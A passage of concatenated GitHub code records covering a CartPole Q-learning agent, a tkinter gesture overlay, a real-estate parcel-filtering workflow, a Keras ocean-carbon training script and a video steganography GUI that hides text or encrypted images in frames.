+= alpha * (reward + self.gamma * np.max(self.Q[next_state]) - self.Q[state][action])\n\n # Reduce Exploration Rate Over time\n def get_epsilon(self, t):\n return max(self.min_epsilon, min(1, 1.0 - math.log10((t + 1) / self.ada_divisor)))\n\n # Reduce Learning Rate over time\n def get_alpha(self, t):\n return max(self.min_alpha, min(1.0, 1.0 - math.log10((t + 1) / self.ada_divisor)))\n\nnum_runs = 1\nrun_rewards = []\nenv = gym.make('CartPole-v0')\n\nfor n in range(num_runs):\n print(\"Run {}\".format(n))\n ep_rewards = []\n num_episodes = 200\n agent = QAgent(env)\n\n for ep in range(num_episodes):\n # As states are continuous, discretize them into buckets\n discretized_state = agent.discretize(env.reset())\n\n # Get adaptive learning alpha and epsilon decayed over time\n alpha = agent.get_alpha(ep)\n epsilon = agent.get_epsilon(ep)\n \n total_reward = 0\n done = False\n #i = 0\n \n while not done:\n # Choose action according to greedy policy and take it\n action = agent.choose_action(discretized_state, epsilon)\n state, reward, done, info = env.step(action)\n next_state = 
agent.discretize(state)\n # Update Q-Table\n agent.update_q(discretized_state, action, reward, next_state, alpha)\n discretized_state = next_state\n #i += 1\n # env.render()\n total_reward += reward\n # time.sleep(0.03)\n ep_rewards.append(total_reward)\n print(\"Episode: {}, total_reward: {:.2f}\".format(ep, total_reward))\n run_rewards.append(ep_rewards)\nenv.close()\n\nfor n, ep_rewards in enumerate(run_rewards):\n x = range(len(ep_rewards))\n cumsum = np.cumsum(ep_rewards)\n avgs = [cumsum[ep]/(ep+1) if ep<100 else (cumsum[ep]-cumsum[ep-100])/100 for ep in x]\n plt.plot(x, avgs)\nplt.title(\"Agent Performance\")\nplt.xlabel(\"Episode\")\nplt.ylabel(\"Average Reward\")","repo_name":"JonasRosenzweig/RLProject","sub_path":"PythonCode/QCartpole.py","file_name":"QCartpole.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36825436546","text":"from RecognitionClass import FaceRecognition\nimport time\nimport ctypes\nfrom playsound import playsound\nfrom micro import microphone\nimport threading\nfrom tkinter import *\nimport os\nfrom PIL import Image, ImageTk\nimport pygame\n\n\nclass thread_with_exception(threading.Thread):\n def __init__(self, name):\n threading.Thread.__init__(self)\n self._stop_event = threading.Event()\n self.name = name\n self.destroyed = None\n self.win = None\n self.screen_width = None\n self.screen_height = None\n self.i = 0\n\n def run(self):\n\n # target function of the thread class\n try:\n print(\"STARTING\", self.name)\n self.getGesturesHelp()\n finally:\n print('ended')\n while True:\n time.sleep(1)\n\n def get_id(self):\n\n # returns id of the respective thread\n if hasattr(self, '_thread_id'):\n return self._thread_id\n for id, thread in threading._active.items():\n if thread is self:\n return id\n def my_join(self):\n print(\"about to join\")\n self.join()\n print(\"joined\")\n\n def stop(self):\n self._stop_event.set()\n\n def raise_exception(self):\n print(\"GETTING EXCEPTION\")\n thread_id = self.get_id()\n res = ctypes.pythonapi.PyThreadState_SetAsyncExc(thread_id,\n ctypes.py_object(SystemExit))\n if res > 1:\n ctypes.pythonapi.PyThreadState_SetAsyncExc(thread_id, 0)\n print('Exception raise failure')\n print(\"done\")\n\n def button_hover(self, e):\n self.win.geometry(\"100x750+{}+{}\".format(self.screen_width - 100, 120))\n self.button.config(bg='#333333')\n self.button.config(fg='#ffffff')\n\n def button_leave(self, e):\n self.win.geometry(\"100x30+{}+{}\".format(self.screen_width - 100, 120))\n self.button.config(fg='#333333')\n self.button.config(bg='#ffffff')\n\n def getGesturesHelp(self):\n print(\"in gesture\")\n # Create an instance of tkinter frame\n self.win = None\n self.win = Tk()\n print(\"after tk\")\n self.win.overrideredirect(1)\n self.win.attributes('-topmost', 'true')\n print(\"after tk2\")\n self.screen_width = self.win.winfo_screenwidth()\n self.screen_height = self.win.winfo_screenheight()\n\n # Set the Geometry\n self.win.geometry(\"100x30+{}+{}\".format(self.screen_width - 100, 120))\n\n print(\"after tk3\")\n # Create a Button for toggle function\n self.button = Button(self.win, text=\"GESTURES\", height=1)\n self.button.config(font=('Verdana', 7))\n self.button.config(fg='#333333')\n self.button.config(bg='#ffffff')\n self.button.config(activebackground='#7a7979')\n\n self.button.config(compound='bottom')\n self.button.pack(fill=X)\n\n self.button.bind(\"<Enter>\", self.button_hover)\n self.button.bind(\"<Leave>\", self.button_leave)\n\n 
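# Load the six gesture reference images from the local 'GesturesImages' folder\n        # (assumed to sit next to this script) and stack them below the toggle button.\n        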
path = 'GesturesImages'\n print(\"after tk4\")\n images_list = os.listdir(path)\n\n image_size = (100, 120)\n print(\"after tk5\")\n\n image = Image.open(path + '/' + images_list[0])\n print(\"after tk5a\")\n image = image.resize(image_size)\n print(\"after tk5b\")\n print(image)\n\n try:\n #img1 = ImageTk.PhotoImage(image=PIL.Image.fromarray(image))\n print(\"self.i\", self.i)\n if self.i == 0:\n\n img1 = ImageTk.PhotoImage(image)\n self.img1 = img1\n print(\"correct\")\n except:\n img1 = self.img1\n print(\"After\")\n\n\n print(\"after tk5c\")\n label = Label(self.win, image=img1)\n label.pack()\n print(\"after tk6\")\n image = Image.open(path + '/' + images_list[1])\n image = image.resize(image_size)\n img2 = ImageTk.PhotoImage(image)\n image.close()\n label = Label(self.win, image=img2)\n label.pack()\n print(\"after tk7\")\n image = Image.open(path + '/' + images_list[2])\n image = image.resize(image_size)\n img3 = ImageTk.PhotoImage(image)\n image.close()\n label = Label(self.win, image=img3)\n label.pack()\n\n image = Image.open(path + '/' + images_list[3])\n image = image.resize(image_size)\n img4 = ImageTk.PhotoImage(image)\n image.close()\n label = Label(self.win, image=img4)\n label.pack()\n\n image = Image.open(path + '/' + images_list[4])\n image = image.resize(image_size)\n img5 = ImageTk.PhotoImage(image)\n image.close()\n label = Label(self.win, image=img5)\n label.pack()\n\n image = Image.open(path + '/' + images_list[5])\n image = image.resize(image_size)\n img6 = ImageTk.PhotoImage(image)\n image.close()\n label = Label(self.win, image=img6)\n label.pack()\n self.i += 1\n print(\"before after\")\n self.win.after(1000, self.check)\n print(\"BEFORE mainloop\")\n\n self.win.mainloop()\n\n def check(self):\n\n if self.destroyed == True:\n self.destroyed = False\n self.win.destroy()\n time.sleep(1)\n else:\n\n self.win.after(1000, self.check)\n\ndef play(sound_, vol):\n sound = pygame.mixer.Sound(sound_)\n sound.set_volume(vol)\n sound.play()\n\ndef start_sound(sound, vol=1):\n\n x = threading.Thread(target=play, args=(sound,vol))\n x.start()\n\n\n\ndef start_micro(lista):\n m = microphone()\n lista.append(m)\n return lista\n\ndef background_startup(detector, cap):\n counter = 0\n while counter < 50:\n print(detector.counter)\n success, img = cap.read()\n img = detector.findHands(img)\n lmList, current_hand, counter = detector.findPosition(img)\n\ndef start_recognition():\n app = FaceRecognition()\n while True:\n # 1. Get all the available classes\n #classes, images = app.getClassesImages()\n\n # 2. Apply the recognition\n user = app.recognition()\n\n # 3. 
Check if the user is registered\n if user is None:\n app.showErrorNoFaceDetected()\n time.sleep(5)\n elif user[\"username\"] == \"Unknown\":\n response = app.askRegistration()\n if response == 1:\n user = app.addNewUser()\n break\n elif response == 2:\n return {'id': None, 'username': 'GuestUser', 'dominant': 'Right', 'tabs': []}\n else:\n app.showInfoNewAttempt()\n time.sleep(3)\n else:\n print(\"welcome back \", str(user[\"username\"]), \"!!!\")\n break\n return user\n\ndef getGesturesHelp():\n # Create an instance of tkinter frame\n win = Tk()\n win.overrideredirect(1)\n win.attributes('-topmost', 'true')\n\n screen_width = win.winfo_screenwidth()\n screen_height = win.winfo_screenheight()\n\n # Set the Geometry\n win.geometry(\"100x30+{}+{}\".format(screen_width - 100, 120))\n\n def toggle():\n if win.winfo_height() == 30:\n win.geometry(\"100x780+{}+{}\".format(screen_width - 100, 120))\n button.config(bg='#333333')\n button.config(fg='#ffffff')\n else:\n win.geometry(\"100x30+{}+{}\".format(screen_width - 100, 120))\n button.config(fg='#333333')\n button.config(bg='#ffffff')\n\n # Create a Button for toggle function\n button = Button(win, text=\"GESTURES\", height=1, command=toggle)\n button.config(font=('Verdana', 7))\n button.config(fg='#333333')\n button.config(bg='#ffffff')\n button.config(activebackground='#7a7979')\n\n button.config(compound='bottom')\n button.pack(fill=X)\n\n path = 'GesturesImages'\n images_list = os.listdir(path)\n\n image_size = (100, 120)\n\n image = Image.open(path + '/' + images_list[0])\n image = image.resize(image_size)\n img1 = ImageTk.PhotoImage(image)\n label = Label(win, image=img1)\n label.pack()\n\n image = Image.open(path + '/' + images_list[1])\n image = image.resize(image_size)\n img2 = ImageTk.PhotoImage(image)\n label = Label(win, image=img2)\n label.pack()\n\n image = Image.open(path + '/' + images_list[2])\n image = image.resize(image_size)\n img3 = ImageTk.PhotoImage(image)\n label = Label(win, image=img3)\n label.pack()\n\n image = Image.open(path + '/' + images_list[3])\n image = image.resize(image_size)\n img4 = ImageTk.PhotoImage(image)\n label = Label(win, image=img4)\n label.pack()\n\n image = Image.open(path + '/' + images_list[4])\n image = image.resize(image_size)\n img5 = ImageTk.PhotoImage(image)\n label = Label(win, image=img5)\n label.pack()\n\n image = Image.open(path + '/' + images_list[5])\n image = image.resize(image_size)\n img6 = ImageTk.PhotoImage(image)\n label = Label(win, image=img6)\n label.pack()\n\n win.mainloop()\n","repo_name":"colloroneluca/HCI","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":8991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74686471468","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 16 16:23:30 2020\n\n@author: ep9k\n\"\"\"\n\n\"\"\" This is the master workflow script I'm using for the 2019 Boone Real Estate mailing list\n\nFollowing steps as outlines in Trello document: https://trello.com/b/Up0JxHMB/boone-real-estate\"\"\"\n\n\nimport geopandas as gpd\nimport pandas as pd\n\n#import condo_buildings_list function\nMODULE_PATH = '/Users/ep9k/Desktop/BRE/BRE 2019/BRE_Condos_List/scripts/CountyFunctions.py'\nMODULE_NAME = 'condo_buildings_list'\nimport importlib\nimport sys\nspec = importlib.util.spec_from_file_location(MODULE_NAME, MODULE_PATH)\nmodule = importlib.util.module_from_spec(spec)\nsys.modules[spec.name] = module 
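# spec_from_file_location -> module_from_spec -> exec_module is the standard\n# importlib recipe for importing a module from an explicit file path.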
\nspec.loader.exec_module(module)\n\nimport BRE_Workflow_Functions as bwf\n\n\n#1. Starting from scratch from original documents. This includes...\n# -Matt's original mailing list (MattOriginalMailingList.xlsx)\n# -Matt's original condo list (MattCondoAddressList2019.xlsx)\n# -All parcels (/Users/ep9k/Desktop/BRE/BRE 2019/All_Parcels_2019.gpkg)\n\n#matt's original mailing list aka 'new list'\noriginal_mailing_list = pd.read_excel('/Users/ep9k/Desktop/BRE/BRE 2019/MattOriginalMailingList.xlsx') #11,827 addresses\nall_2019_parcels = gpd.read_file('/Users/ep9k/Desktop/BRE/BRE 2019/All_Parcels_2019.gpkg') #228,393 parcels\n#all_2018_parcels = pd.read_csv('/Users/ep9k/Desktop/BRE/2018Keepers.csv') #17417 parcels\ncondos_list_2019 = pd.read_excel(r'/Users/ep9k/Desktop/BRE/BRE 2019/MattCondoAddressList2019.xlsx') #3139 parcels\n\n\n\n#2. Drop useless columns from all_2019_parcels to make data cleaner. Create Address columns to merge with original_mailing_list \ncolumns_to_drop = ['id_0', 'id', 'gnisid', 'maddpref', 'maddrno',\n 'maddstname', 'maddstr', 'maddstsuf', 'maddsttyp', 'mapref', \n 'munit', 'ownfrst', 'ownlast', 'owntype', 'parusedsc2', 'revdatetx',\n 'saddpref', 'scity', 'structno', 'subdivisio', 'subowntype', 'subsurfown', 'sunit',\n 'szip', 'layer', 'path']\n\nall_2019_parcels.drop(columns_to_drop, inplace=True, axis=1)\n\n\n\n#3. MattOriginalMailing list is not actually his original, but it is a list we have edited (most recent 4/18/2020) with 2+ removed and Subdivision columns in tact. \n##This had already been joined to the county parcels so I will merge based on the nparno\nall_2019_parcels = all_2019_parcels.merge(original_mailing_list, how='left', left_on='parno', right_on='parno')\n\n#drop useless columns from all_2019_parcels. All I want to keep after the merge is the 2+ removed, subdivision, and excluded subdivision columns\n\ncolumns_to_drop = ['altparno_y','sourceagnt_y','Unnamed: 9','id_2','fid','id','cntyfips_y','gisacres_y','ownname2_y','gnisid', 'maddpref','maddrno','maddstname','maddstr',\n 'maddstsuf','mapref','multistruc_y','munit','maddsttyp','ownfrst','ownlast','owntype','parusedsc2','parvaltype_y','presentval_y','recareano_y','recareatx_y',\n 'revdatetx','revisedate_y','reviseyear_y','saddno_y','saddpref','saddstname_y','saddstr_y','saddstsuf_y','saddsttyp_y','saledate_y','saledatetx_y',\n 'scity','sourcedate_y','sourcedatx_y','sourceref_y','sstate_y','stcntyfips_y','stfips_y','stname_y','structno','subdivisio','subowntype','subsurfown',\n 'sunit','szip','transfdate_y','id_0','id_1','layer','path', 'cntyname_y','improvval_y','landval_y','legdecfull_y','nparno_y','parusecd2_y','parusecode_y',\n 'parusedesc_y','struct_y','structyear_y']\n\n\n\nall_2019_parcels.drop(columns_to_drop, inplace=True, axis=1)\n\n##the columns in all_2019_parcels get renamed (ex:altparno_x) so I rename them to keep things clean\nall_2019_parcels.rename(columns = {'altparno_x': 'altparno','cntyfips_x': 'cntyfips','cntyname_x': 'cntyname','gisacres_x': 'gisacres',\n 'improvval_x': 'improvval','landval_x': 'landval','legdecfull_x': 'ledgecfull','multistruc_x': 'multistruc',\n 'ownname2_x': 'ownname2','parno_x': 'parno','parusecd2_x': 'parusecd2','parusecode_x': 'parusecode','parusedesc_x': 'parusedesc',\n 'parval': 'parval','parvaltype_x': 'parvaltype','presentval_x': 'presentval','recareano_x': 'recareano',\n 'recareatx_x': 'recareatx','revisedate_x': 'revisedate','reviseyear_x': 'reviseyear','saddno_x': 'saddno',\n 'saddstname_x': 'saddstname','saddstr_x': 'saddstr','saddstsuf_x': 
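The module-loading boilerplate just above follows the standard importlib recipe for importing a Python file by path. A reusable sketch of that recipe (the helper name and error message are ours):

import importlib.util
import sys

def load_module_from_path(name, path):
    """Import a Python source file that lives outside sys.path."""
    spec = importlib.util.spec_from_file_location(name, path)
    if spec is None or spec.loader is None:
        raise ImportError("cannot load %s from %s" % (name, path))
    module = importlib.util.module_from_spec(spec)
    sys.modules[spec.name] = module  # register before executing, as above
    spec.loader.exec_module(module)
    return module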
'saddstsuf','saddsttyp_x': 'saddsttyp',\n 'saledate_x': 'saledate','saledatetx_x': 'saledatetx','sourceagnt_x': 'sourceagnt','sourcedate_x': 'sourcedate',\n 'sourcedatx_x': 'sourcedatx','sourceref_x': 'sourceref','sstate_x': 'sstate','stcntyfips_x': 'stcntyfips','stfips_x': 'stfips',\n 'stname_x': 'stname','struct_x': 'struct','structyear_x': 'structyear','transfdate_x': 'transfdate'},\n inplace=True)\n\n\n\n#4. Create Vacant Land Property Type\n\n#create 'Property Type' column and populate with true/false alues\nall_2019_parcels['Property Type'] = all_2019_parcels['landval'] == all_2019_parcels['parval']\n\n#change true/false values to 'Vacant Land' or no value. There are 95593 vacant land parcels.\nall_2019_parcels.loc[(all_2019_parcels['Property Type'] == True), 'Property Type'] = 'Vacant Land'\nall_2019_parcels.loc[(all_2019_parcels['Property Type'] == False), 'Property Type'] = ''\n\n\n##Label others from Watauga County using parusedesc. Now there are 95783 vacant land parcels (added about 200 parcels)\nall_2019_parcels = bwf.property_type_column(all_2019_parcels)\n\n#make vacant land dataframe\nvacant_land_df = all_2019_parcels[all_2019_parcels['Property Type'] == 'Vacant Land']\n#drop non-vacant land parcels from all_2019_parcels\nall_2019_parcels = all_2019_parcels[all_2019_parcels['Property Type'] != 'Vacant Land']\n\n#apply filters to vacant land df\nvacant_land_df = bwf.vacant_land_filters(vacant_land_df)\n#we are left with 4811 vacant land parcels\n\n\n\n#5. Label condo buildings as 'Property Type' = 'Condo Building'\n#first, read in condos list\n#uses condo_buildings_list function from BRE_condos_list folder (import statements at top)\ncondo_building_ids = module.condo_buildings_list(condos_list_2019)\n\n#iterate over list (condo_building_ids) and add 'Property Type' of 'Condo Building'\nall_2019_parcels.loc[all_2019_parcels['parno'].isin(condo_building_ids), 'Property Type'] = 'Condo Building'\n\n#remove condo buildings from list\nall_2019_parcels = all_2019_parcels.loc[all_2019_parcels['Property Type'] != 'Condo Building']\n\n\n#export to shapefile\nall_2019_parcels = gpd.GeoDataFrame(all_2019_parcels, geometry='geometry')\nall_2019_parcels.to_file('/Users/ep9k/Desktop/all_2019_parcels.shp')\n#move this to PostgreSQL database as new 'all_2019_parcels'\n\nvacant_land_df = gpd.GeoDataFrame(vacant_land_df, geometry='geometry')\nvacant_land_df.to_file('/Users/ep9k/Desktop/vacant_land.shp')\n##FINAL RESULT FROM THIS IS allkeepers_2019 and vacant_land_df\n#\n#\n#\n#\n##6. 
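Step 4 above flags a parcel as vacant when its land value equals its total parcel value, i.e. when no improvement value is present. A toy sketch of the same test using np.where instead of the boolean-then-relabel two-step (the DataFrame here is illustrative):

import numpy as np
import pandas as pd

parcels = pd.DataFrame({"landval": [10, 5, 7], "parval": [10, 9, 7]})
parcels["Property Type"] = np.where(
    parcels["landval"] == parcels["parval"], "Vacant Land", "")
print(parcels)  # rows 0 and 2 come out as vacant land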
GO TO QGIS/POSTGRESQL with the all_2019_parcels and do the zones + price filtering\n##output of this is all_keepers2019\n##Also with vacant_land_df, clip parcels to extent of AllZonesExtent\n##output of this is vacant_land_keepers\n#\n#\n#\n\n","repo_name":"epurpur/BooneRealEstate","sub_path":"BRE_2019_Master_Workflow_pt1.py","file_name":"BRE_2019_Master_Workflow_pt1.py","file_ext":"py","file_size_in_byte":7390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18507989152","text":"import numpy as np\r\nfrom tensorflow.keras.optimizers import Adam\r\nfrom keras.callbacks import CSVLogger, EarlyStopping, ModelCheckpoint\r\nimport argparse\r\nimport sys\r\nimport glob\r\nfrom datetime import datetime\r\n\r\nfrom model.core import RUnet_model\r\nfrom utils.functions import r_score, mse_nonzero, data_split\r\nfrom utils.data_generator import data_generator\r\n\r\n\r\n\r\ndef parse_args():\r\n \"\"\"\r\n Parse input arguments\r\n \"\"\"\r\n parser = argparse.ArgumentParser(description='Train a SOC model')\r\n\r\n parser.add_argument('--x', dest='x_files',\r\n help='Filenames of x data',\r\n default=None, type=str, nargs='+')\r\n\r\n parser.add_argument('--y', dest='y_files',\r\n help='Filenames of y data',\r\n default=None, type=str, nargs='+')\r\n\r\n parser.add_argument('--lvl1', dest='level1',\r\n help='First (upper) layer',\r\n default=None, type=int, nargs=1)\r\n\r\n parser.add_argument('--lvl2', dest='level2',\r\n help='Second (lower) layer',\r\n default=None, type=int, nargs=1)\r\n\r\n\r\n # datetime object containing current date and time\r\n now = datetime.now()\r\n dt_string = now.strftime(\"%d-%m-%Y_%H:%M:%S\")\r\n\r\n parser.add_argument('--o', dest='outname',\r\n help='Trained model name',\r\n default='DLSOC_model_trained_' + dt_string + '.h5', type=str, nargs='?')\r\n\r\n parser.add_argument('--lr', dest='lr',\r\n help='Learning rate',\r\n default=1e-5, type=float, nargs='?')\r\n\r\n parser.add_argument('--w', dest='weights',\r\n help='Pretrained model weights',\r\n default=None, type=str, nargs='?')\r\n\r\n parser.add_argument('--b', dest='batch_size',\r\n help='Size for batch training',\r\n default=5, type=int, nargs='?')\r\n\r\n\r\n if len(sys.argv) < 5:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n args = parser.parse_args()\r\n\r\n if (not args.x_files) or (not args.y_files):\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n if (not args.level1) or (not args.level2):\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n args = parse_args()\r\n\r\n print('Called with args: ')\r\n print('X filenames: ', args.x_files)\r\n print('Y filenames: ', args.y_files)\r\n print('First level: ', args.level1)\r\n print('Second level: ', args.level2)\r\n print('Batch size: ', args.batch_size)\r\n print('Learning rate: ', args.lr)\r\n print('Output model name: ', args.outname)\r\n\r\n _xfiles = np.array(sorted(args.x_files))\r\n _yfiles = np.array(sorted(args.y_files))\r\n _level1 = args.level1[0]\r\n _level2 = args.level2[0]\r\n _batchsize = args.batch_size\r\n _lr = args.lr\r\n\r\n soc_model = RUnet_model(_level1, _level2)\r\n opt = Adam(lr=_lr) \r\n soc_model.compile(optimizer=opt, loss=mse_nonzero, metrics=[r_score, mse_nonzero])\r\n soc_model.info()\r\n\r\n # load pretrained model weights if provided\r\n if args.weights:\r\n soc_model.load_weights(args.weights)\r\n\r\n xtrain, ytrain, xvalid, yvalid, xtest, ytest = data_split(_xfiles, _yfiles, 0.7225, 0.85, 
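The argument parsing that begins above uses nargs='+' so each flag collects one or more filenames. A trimmed, self-contained sketch of the same pattern, with required=True standing in for the record's manual checks (only a subset of its flags is shown):

import argparse

def parse_args(argv=None):
    parser = argparse.ArgumentParser(description="Train a SOC model")
    parser.add_argument("--x", dest="x_files", nargs="+", required=True,
                        help="Filenames of x data")
    parser.add_argument("--y", dest="y_files", nargs="+", required=True,
                        help="Filenames of y data")
    parser.add_argument("--lr", dest="lr", type=float, default=1e-5,
                        help="Learning rate")
    return parser.parse_args(argv)

print(parse_args(["--x", "a.nc", "b.nc", "--y", "c.nc"]))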
maskname='sample_train_valid_test_mask.npz')\r\n train_generator = data_generator(xtrain, ytrain, _level1, _level2, batch_size=_batchsize)\r\n valid_generator = data_generator(xvalid, yvalid, _level1, _level2, batch_size=_batchsize)\r\n\r\n\r\n csv_logger = CSVLogger( 'sample_log.csv' , append=True, separator=';')\r\n earlystopper = EarlyStopping(patience=20, verbose=1)\r\n checkpointer = ModelCheckpoint('checkpt_{val_loss:.2e}_example.h5', verbose=1, save_best_only=True)\r\n soc_model.train(train_generator,\r\n validation_data=valid_generator, epochs=250,\r\n callbacks=[earlystopper, checkpointer, csv_logger])\r\n\r\n soc_model.save_model(args.outname)","repo_name":"tailonghe/Southern_Ocean_Carbon","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74070506988","text":"# note that module name has changed from Tkinter in Python 2 to tkinter in Python 3\n# install stegano, python-opencv, python3-tk, ffmpeg\nimport tkinter\nimport os\nimport shutil\nimport math\nimport base64\nimport cv2\nimport ed\n\nfrom stegano import lsb\nfrom tkinter.ttk import Progressbar\nfrom subprocess import call, STDOUT\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom tkinter.filedialog import askopenfile\nfrom PIL import Image\n\nvideo_path = ''\nimg_path = ''\n\nprint(\"video steganography\")\nroot = tkinter.Tk()\nroot.title(\"Video_Steganography\")\nroot.configure(bg=\"dark slate gray\")\n\n\ndef split_string(s_str, count=10):\n per_c = math.ceil(len(s_str) / count)\n c_cout = 0\n out_str = ''\n split_list = []\n for s in s_str:\n out_str += s\n c_cout += 1\n if c_cout == per_c:\n split_list.append(out_str)\n out_str = ''\n c_cout = 0\n if c_cout != 0:\n split_list.append(out_str)\n return split_list\n\n\ndef frame_extraction(video):\n if not os.path.exists(\"./tmp\"):\n os.makedirs(\"tmp\")\n temp_folder = \"./tmp\"\n print(\"[INFO] tmp directory is created\")\n video_cap = cv2.VideoCapture(video)\n count = 0\n while True:\n success, image = video_cap.read()\n if not success:\n print(\"[ERR] Some error occurred\", success)\n break\n cv2.imwrite(os.path.join(temp_folder, \"{:d}.png\".format(count)), image)\n count += 1\n\n\n# for type= text:10 img:500\ndef encode_string(input_string, types=10, temp=\"./tmp/\"):\n split_string_list = split_string(input_string, types)\n for i in range(0, len(split_string_list)):\n f_name = \"{}{}.png\".format(temp, i)\n secret_enc = lsb.hide(f_name, split_string_list[i])\n secret_enc.save(f_name)\n print(\"[INFO] frame {} holds {}\".format(f_name, split_string_list[i]))\n\n\ndef decode_string(video):\n progress = Progressbar(root, orient=HORIZONTAL, length=100, mode='determinate')\n progress.grid(row=9, column=0, columnspan=3, padx=10, pady=10)\n frame_extraction(video)\n secret = []\n tmp = \"./tmp/\"\n progress['value'] = 20\n root.update_idletasks()\n for i in range(len(os.listdir(tmp))):\n f_name = \"{}{}.png\".format(tmp, i)\n # print(\"[INFO] Decoding frame {}\", f_name)\n secret_dec = lsb.reveal(f_name)\n # print(\"[INFO] Got {} from frame {}\", secret_dec, f_name)\n if secret_dec is None:\n break\n secret.append(secret_dec)\n\n print(''.join([i for i in secret]))\n e2.delete(0, \"end\")\n e2.insert(0, ''.join([i for i in secret]))\n progress['value'] = 100\n root.update_idletasks()\n clean_tmp()\n progress.destroy()\n\n\ndef clean_tmp(path=\"./tmp\"):\n if os.path.exists(path):\n 
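The split_string helper near the top of the steganography script above distributes a message into roughly equal chunks, one per video frame. A slicing sketch of the same computation (the max(1, ...) guard keeps it safe for empty input):

import math

def split_string(s, count=10):
    """Split `s` into ceil(len/count)-sized chunks, one per frame."""
    per = max(1, math.ceil(len(s) / count))
    return [s[i:i + per] for i in range(0, len(s), per)]

chunks = split_string("attack at dawn", 4)
print(chunks)  # four chunks of up to four characters
assert "".join(chunks) == "attack at dawn"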
shutil.rmtree(path)\n print(\"[INFO] tmp files are cleaned up\")\n\n\n# select a carrier video file\ndef open_file():\n desktop = os.path.join(os.path.join(os.path.expanduser('~')), 'Desktop')\n file = askopenfile(initialdir=desktop, mode='r', filetypes=[('Video Files', '*.mp4'), ('Video Files', '*.mov')])\n if file is None:\n print(\"No file selected\")\n messagebox.showwarning(\"warning\", \"Select a video file\")\n else:\n print(\"file name:\", file.name)\n e1.delete(0, \"end\")\n e1.insert(0, file.name)\n print(os.path.basename(file.name))\n global video_path\n video_path = os.path.basename(file.name)\n print('[info]', video_path)\n shutil.copy(file.name, os.getcwd())\n\n\n# select an stego_image file from desktop\ndef open_file_for_image():\n print(\"openfile\")\n desktop = os.path.join(os.path.join(os.path.expanduser('~')), 'Desktop')\n file = askopenfile(initialdir=desktop, mode='r',\n filetypes=[('Img', '*.png'), ('Img', '*.jpg'), ('Img', '*.bmp'), ('Img', '*.jpeg')])\n if file is None:\n print(\"No file selected\")\n messagebox.showwarning(\"warning\", \"Select an image file\")\n else:\n print(\"file name:\", file.name)\n e3.delete(0, \"end\")\n e3.insert(0, file.name)\n print(os.path.basename(file.name))\n global img_path\n img_path = os.path.basename(file.name)\n print('[info]', img_path)\n shutil.copy(file.name, os.getcwd())\n\n\ndef tmp_show_image():\n Image.open(\"text.png\").show()\n\n\n# encoding image into video where image in img_path and video in video_path\ndef encode_image_into_video():\n if e4.get() != '':\n key = e4.get()\n else:\n key = 'python'\n print(\"[info] key\", key)\n ed.pixelchange(img_path)\n ed.encryption_with_aes(img_path, ed.SALT, img_path, key)\n progress = Progressbar(root, orient=HORIZONTAL, length=100, mode='determinate')\n progress.grid(row=9, column=1, columnspan=4)\n print(\"|Encrypt| img in video start\")\n print(\"image: \", img_path)\n print(\"video:\", video_path)\n progress['value'] = 10\n root.update_idletasks()\n with open(img_path, \"rb\") as image:\n bstr = base64.b64encode(image.read())\n print(bstr)\n f_name = video_path\n input_string = str(bstr)\n progress['value'] = 20\n root.update_idletasks()\n frame_extraction(f_name)\n progress['value'] = 40\n root.update_idletasks()\n call([\"ffmpeg\", \"-i\", f_name, \"-q:a\", \"0\", \"-map\", \"a\", \"tmp/audio.mp3\", \"-y\"], stdout=open(os.devnull, \"w\"),\n stderr=STDOUT)\n encode_string(input_string, 500)\n call([\"ffmpeg\", \"-i\", \"tmp/%d.png\", \"-vcodec\", \"png\", \"tmp/video.mov\", \"-y\"], stdout=open(os.devnull, \"w\"),\n stderr=STDOUT)\n progress['value'] = 60\n root.update_idletasks()\n call([\"ffmpeg\", \"-i\", \"tmp/video.mov\", \"-i\", \"tmp/audio.mp3\", \"-codec\", \"copy\", \"video.mp4\", \"-y\"],\n stdout=open(os.devnull, \"w\"), stderr=STDOUT)\n progress['value'] = 80\n root.update_idletasks()\n desktop = os.path.join(os.path.join(os.path.expanduser('~')), 'Desktop')\n progress['value'] = 90\n root.update_idletasks()\n shutil.copy(\"video.mp4\", desktop)\n print(\"|Info| encryption image in video is Done....\")\n progress['value'] = 100\n root.update_idletasks()\n clean_tmp()\n progress.destroy()\n\n\n# decoding image from video where video is in video_path\ndef decode_image_form_video():\n # video.mp4\n progress = Progressbar(root, orient=HORIZONTAL, length=100, mode='determinate')\n progress.grid(row=9, column=1, columnspan=4)\n print(\"video_decoding start\")\n progress['value'] = 20\n root.update_idletasks()\n frame_extraction(video_path)\n secret = []\n tmp = 
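The encode path above shells out to ffmpeg via subprocess.call with stdout discarded, so failures pass silently. A sketch of the audio-extraction step with error checking (same command line as the record; ffmpeg must be on PATH):

import subprocess

def extract_audio(video, out="tmp/audio.mp3"):
    """Pull the audio track out of `video`, raising on ffmpeg errors."""
    subprocess.run(
        ["ffmpeg", "-i", video, "-q:a", "0", "-map", "a", out, "-y"],
        check=True, capture_output=True)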
